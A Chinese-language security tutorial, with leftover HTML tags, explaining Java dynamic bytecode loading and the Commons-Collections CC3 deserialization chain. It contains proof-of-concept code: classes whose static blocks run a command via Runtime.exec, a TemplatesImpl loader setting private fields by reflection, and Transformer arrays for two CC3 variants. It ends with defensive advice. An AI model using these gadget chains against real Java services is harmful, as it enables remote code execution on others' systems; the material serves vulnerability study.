Java动态加载字节码与CC3反序列化漏洞深入解析<\/strong><\/h3>
文档版本：<\/strong> 1.0
发布日期：<\/strong> 2023-10-26
目标读者：<\/strong> 具备Java基础和安全入门知识的开发者、安全研究人员<\/p>
一、核心概念：Java字节码与动态加载<\/strong><\/h4>
1.1 什么是Java字节码（ByteCode）？<\/strong><\/p>

定义：<\/strong> Java字节码是一套专为Java虚拟机（JVM）设计的指令集。它是Java源代码（.java文件）经过编译器（javac）编译后生成的中间格式文件（.class文件）。<\/li>
核心价值 - 跨平台：<\/strong> Java的核心优势“一次编写，到处运行”正是基于字节码和JVM实现的。不同平台的JVM会解释执行相同的字节码，从而屏蔽底层操作系统的差异。<\/li>
扩展性：<\/strong> 任何能够被编译成合法Java字节码的语言（如Scala、Kotlin、Jython），都可以在JVM上运行。<\/li> <\/ul>
1.2 什么是动态加载字节码？<\/strong><\/p>

通常情况下，类是在JVM启动时或程序首次主动引用时，由类加载器从classpath<\/code>下加载的。<\/li>
动态加载<\/strong> 指的是在程序运行时<\/strong>，通过特定的API，从非classpath<\/code>的路径（如文件系统、网络地址、甚至内存中的字节数组）手动加载并初始化一个类。这为程序带来了极大的灵活性，但也引入了严重的安全风险。<\/li> <\/ul> 二、动态加载字节码的三种核心方法<\/strong><\/h4> 2.1 利用 URLClassLoader<\/code> 加载远程或本地class文件<\/strong><\/p> 工作机制：<\/strong> URLClassLoader<\/code> 是Java默认类加载机制的一个体现。它根据提供的URL基础路径来寻找并加载类。路径规则：<\/strong> file:\/\/\/path\/to\/dir\/<\/code> （以\/<\/code>结尾）：视为目录，使用 FileLoader<\/code> 从文件系统加载。<\/li> file:\/\/\/path\/to\/jar.jar<\/code> （不以\/<\/code>结尾）：视为JAR文件，使用 JarLoader<\/code> 从JAR包中加载。<\/li> http:\/\/example.com\/path\/<\/code> （非file<\/code>协议）：使用基础的 Loader<\/code> 从网络加载。<\/li> <\/ul> <\/li> <\/ul> <\/li> 示例1：加载本地class文件（file协议）<\/strong> \/\/ 待加载的恶意类 Calc.java <\/span><\/span><\/span><\/span>import<\/span> java.io.IOException;<\/span> <\/span><\/span>public<\/span> class<\/span> Calc<\/span> {<\/span> <\/span><\/span> static<\/span> {<\/span> \/\/ 静态代码块，在类初始化时执行 <\/span><\/span><\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span>(<\/span>IOException e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>\/\/ 加载并触发 <\/span><\/span><\/span><\/span>import<\/span> java.net.URL;<\/span> <\/span><\/span>import<\/span> java.net.URLClassLoader;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> ClassLoader_Calc<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 指向包含 Calc.class 文件的目录 <\/span><\/span><\/span><\/span> URLClassLoader urlClassLoader =<\/span> new<\/span> URLClassLoader(<\/span>new<\/span> URL[]{<\/span>new<\/span> URL(<\/span>"file:\/\/\/E:\\"<\/span>)});<\/span> <\/span><\/span> Class calc =<\/span> urlClassLoader.<\/span>loadClass<\/span>(<\/span>"Calc"<\/span>);<\/span> \/\/ 加载类 <\/span><\/span><\/span><\/span> calc.<\/span>newInstance<\/span>();<\/span> \/\/ 触发类的初始化，从而执行静态块中的代码 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 示例2：加载远程class文件（http协议）<\/strong> \/\/ 在 http:\/\/localhost:8999\/ 上提供 Calc.class 文件 <\/span><\/span><\/span><\/span>import<\/span> java.net.URL;<\/span> <\/span><\/span>import<\/span> java.net.URLClassLoader;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> HelloClassLoader<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> URL[]<\/span> urls =<\/span> {<\/span>new<\/span> URL(<\/span>"http:\/\/localhost:8999\/"<\/span>)};<\/span> <\/span><\/span> URLClassLoader classLoader =<\/span> URLClassLoader.<\/span>newInstance<\/span>(<\/span>urls);<\/span> <\/span><\/span> Class c =<\/span> classLoader.<\/span>loadClass<\/span>(<\/span>"Calc"<\/span>);<\/span> <\/span><\/span> c.<\/span>newInstance<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2.2 利用 ClassLoader#defineClass<\/code> 直接加载字节码<\/strong><\/p> 核心流程：<\/strong> 标准的类加载流程是 loadClass<\/code> -> findClass<\/code> -> defineClass<\/code>。 loadClass<\/code>：遵循双亲委派模型，先检查类是否已加载，再委托父加载器。<\/li> findClass<\/code>：根据位置（文件系统、网络等）查找类的字节码。<\/li> defineClass<\/code>：最核心的一步<\/strong>。它接受一个字节数组（即.class<\/code>文件的二进制内容），并将其转换为JVM内部的Class<\/code>对象。这是一个final<\/code>方法，包含了类验证、解析等复杂逻辑。<\/li> <\/ul> <\/li> 关键点：<\/strong> defineClass<\/code> 方法是protected<\/code>的，无法直接调用。但可以通过反射来突破限制。<\/li> 示例：<\/strong> import<\/span> java.lang.reflect.Method;<\/span> <\/span><\/span>import<\/span> java.util.Base64;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> DefineClass<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> \/\/ 通过反射获取 defineClass 方法 <\/span><\/span><\/span><\/span> Method defineClass =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span> <\/span><\/span> defineClass.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> \/\/ 突破访问限制 <\/span><\/span><\/span><\/span> <\/span><\/span> \/\/ 这里是 Hello.class 的 Base64 编码字节码 <\/span><\/span><\/span><\/span> byte<\/span>[]<\/span> code =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>"yv66vgAAADQAGwoABgANCQAOAA8IABAKABEAEgcAEwcAFAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApTb3VyY2VGaWxlAQAKSGVsbG8uamF2YQwABwAIBwAVDAAWABcBAAtIZWxsbyBXb3JsZAcAGAwAGQAaAQAFSGVsbG8BABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAABAAEABwAIAAEACQAAAC0AAgABAAAADSq3AAGyAAISA7YABLEAAAABAAoAAAAOAAMAAAACAAQABAAMAAUAAQALAAAAAgAM"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 使用系统类加载器调用 defineClass，定义出 Hello 类 <\/span><\/span><\/span><\/span> Class hello =<\/span> (<\/span>Class)<\/span> defineClass.<\/span>invoke<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> "Hello"<\/span>,<\/span> code,<\/span> 0<\/span>,<\/span> code.<\/span>length<\/span>);<\/span> <\/span><\/span> hello.<\/span>newInstance<\/span>();<\/span> \/\/ 实例化，触发初始化 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2.3 利用 TemplatesImpl<\/code> 加载字节码（CC3链核心）<\/strong><\/p> 背景：<\/strong> 直接使用反射调用defineClass<\/code>在某些受限制的环境下可能不可行。我们需要找到一个在JDK自带的库中、能够被序列化\/反序列化、并且内部调用了defineClass<\/code>的“跳板”类。com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/code> 就是这样一个类。<\/li> 调用链分析（核心）：<\/strong> 入口点：<\/strong> TemplatesImpl#newTransformer()<\/code> 是一个公有方法。<\/li> 触发实例化：<\/strong> newTransformer()<\/code> 内部调用 getTransletInstance()<\/code>。<\/li> 触发类定义：<\/strong> getTransletInstance()<\/code> 内部调用 defineTransletClasses()<\/code>。<\/li> 最终加载：<\/strong> defineTransletClasses()<\/code> 使用其内部的 TransletClassLoader<\/code> 来调用 defineClass(_bytecodes[i])<\/code>，从而加载我们传入的恶意字节码。<\/li> <\/ol> <\/li> 关键属性设置：<\/strong> 要成功利用TemplatesImpl<\/code>，需要通过反射设置其私有字段： _bytecodes<\/code>：设置为一个字节数组的数组（byte[][]<\/code>），其中包含我们恶意类的字节码。<\/li> _name<\/code>：随意设置一个非空字符串（如"aaa"<\/code>），避免空指针异常。<\/li> _tfactory<\/code>：必须设置为一个 TransformerFactoryImpl<\/code> 实例，因为defineTransletClasses<\/code>方法中会用到它。<\/li> _transletIndex<\/code>：这个值由defineTransletClasses<\/code>方法计算得出。关键点在于，我们恶意类的父类必须是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code>，否则 _transletIndex<\/code> 会被设为 -1，导致后续实例化失败。<\/strong><\/li> <\/ul> <\/li> 完整的恶意类与POC：<\/strong> \/\/ 恶意类 Test.java，必须继承 AbstractTranslet <\/span><\/span><\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.DOM;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.TransletException;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;<\/span> <\/span><\/span>import<\/span> java.io.IOException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Test<\/span> extends<\/span> AbstractTranslet {<\/span> <\/span><\/span> static<\/span> {<\/span> \/\/ 静态块，在类被定义时执行 <\/span><\/span><\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 实现父类抽象方法（内容可为空，但必须存在） <\/span><\/span><\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers)<\/span> throws<\/span> TransletException {}<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler)<\/span> throws<\/span> TransletException {}<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>\/\/ 利用 TemplatesImpl 加载字节码的 POC <\/span><\/span><\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span> <\/span><\/span>import<\/span> java.nio.file.Files;<\/span> <\/span><\/span>import<\/span> java.nio.file.Paths;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> HelloTemplateImpl<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 使用反射设置私有字段 <\/span><\/span><\/span><\/span> setFieldValue(<\/span>templates,<\/span> "_name"<\/span>,<\/span> "aaa"<\/span>);<\/span> <\/span><\/span> setFieldValue(<\/span>templates,<\/span> "_bytecodes"<\/span>,<\/span> new<\/span> byte<\/span>[][]{<\/span>Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"E:\/\/Test.class"<\/span>))});<\/span> <\/span><\/span> setFieldValue(<\/span>templates,<\/span> "_tfactory"<\/span>,<\/span> new<\/span> TransformerFactoryImpl());<\/span> <\/span><\/span> <\/span><\/span> \/\/ 触发漏洞链 <\/span><\/span><\/span><\/span> templates.<\/span>newTransformer<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> static<\/span> void<\/span> setFieldValue<\/span>(<\/span>Object obj,<\/span> String fieldName,<\/span> Object value)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Field field =<\/span> obj.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span> <\/span><\/span> field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> field.<\/span>set<\/span>(<\/span>obj,<\/span> value);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 三、 CC3反序列化漏洞链分析<\/strong><\/h4> CC3链是Commons-Collections反序列化漏洞家族中的一个，它结合了CC1的TransformedMap<\/code>\/LazyMap<\/code>链和TemplatesImpl<\/code>的动态加载字节码能力，实现了无需依赖第三方库（如javassist<\/code>）的代码执行。<\/p> 3.1 环境与依赖<\/strong><\/p> Apache Commons Collections <= 3.2.1<\/li> JDK版本 < 8u71（或需要配置sun.reflect.noInflation<\/code>等属性，因为高版本JDK对反射进行了优化，影响了CC1链的触发方式）。<\/li> <\/ul> 3.2 两条主要的CC3链<\/strong><\/p> 链1：CC1 (InvokerTransformer) + TemplatesImpl<\/strong><\/p> 思路：<\/strong> 利用CC1链中的InvokerTransformer<\/code>，将其调用的方法指向TemplatesImpl#newTransformer<\/code>。<\/li> 构造：<\/strong> 将CC1链中最终执行命令的InvokerTransformer<\/code>（如执行Runtime.exec<\/code>的）替换为调用newTransformer<\/code>的InvokerTransformer<\/code>。 \/\/ 关键Transformer设置 <\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>templates),<\/span> \/\/ templates 是设置好恶意字节码的TemplatesImpl对象 <\/span><\/span><\/span><\/span> new<\/span> InvokerTransformer(<\/span>"newTransformer"<\/span>,<\/span> null<\/span>,<\/span> null<\/span>)<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre><\/li> 流程：<\/strong> 反序列化 -> CC1链触发 -> InvokerTransformer#transform(templates)<\/code> -> templates.newTransformer()<\/code> -> 触发TemplatesImpl<\/code>链 -> 加载恶意字节码 -> 执行静态代码块中的命令。<\/li> <\/ul> 链2：CC3 (InstantiateTransformer)<\/strong><\/p> 思路：<\/strong> 利用InstantiateTransformer<\/code>来实例化一个TrAXFilter<\/code>对象。TrAXFilter<\/code>的构造函数中会调用TemplatesImpl#newTransformer<\/code>。<\/li> 构造：<\/strong> 更为直接。通过InstantiateTransformer<\/code>来new<\/code>一个TrAXFilter<\/code>实例，并将TemplatesImpl<\/code>对象传给它的构造函数。 \/\/ 关键Transformer设置 <\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>TrAXFilter.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InstantiateTransformer(<\/span> <\/span><\/span> new<\/span> Class[]<\/span> {<\/span> Templates.<\/span>class<\/span> },<\/span> <\/span><\/span> new<\/span> Object[]<\/span> {<\/span> templates }<\/span> <\/span><\/span> )<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre><\/li> 流程：<\/strong> 反序列化 -> Transformer链触发 -> InstantiateTransformer#transform(TrAXFilter.class)<\/code> -> new TrAXFilter(templates)<\/code> -> TrAXFilter<\/code>构造函数 -> templates.newTransformer()<\/code> -> 触发TemplatesImpl<\/code>链。<\/li> <\/ul> 四、总结与关键点回顾<\/strong><\/h4> 核心机制：<\/strong> 动态加载字节码的核心是绕过常规的类加载路径，通过defineClass<\/code>方法将字节数组直接转换为JVM中的类。<\/li> 关键类：<\/strong> TemplatesImpl<\/code> 是JDK中一个极其重要的“跳板”，它提供了一个从公有方法到内部defineClass<\/code>调用的完整路径，是许多高级漏洞利用链的基石。<\/li> 利用前提：<\/strong> 使用TemplatesImpl<\/code>时，恶意类必须继承AbstractTranslet<\/code><\/strong>，并且需要正确设置_bytecodes<\/code>、_name<\/code>、_tfactory<\/code>等字段。<\/li> 防御思路：<\/strong> 代码层面：<\/strong> 避免反序列化不可信的数据。升级Commons Collections等有漏洞的库。<\/li> 策略层面：<\/strong> 使用Java安全管理器（SecurityManager）配置严格的权限策略，限制代码执行、文件读写、网络访问等敏感操作。<\/li> 运行时环境：<\/strong> 及时更新JDK，高版本JDK对反序列化漏洞有更好的内置防护。<\/li> <\/ul> <\/li> <\/ol> 这份文档详细拆解了从基础概念到高级利用的完整知识链。理解这些内容对于深入Java应用安全、代码审计和漏洞研究至关重要。<\/p>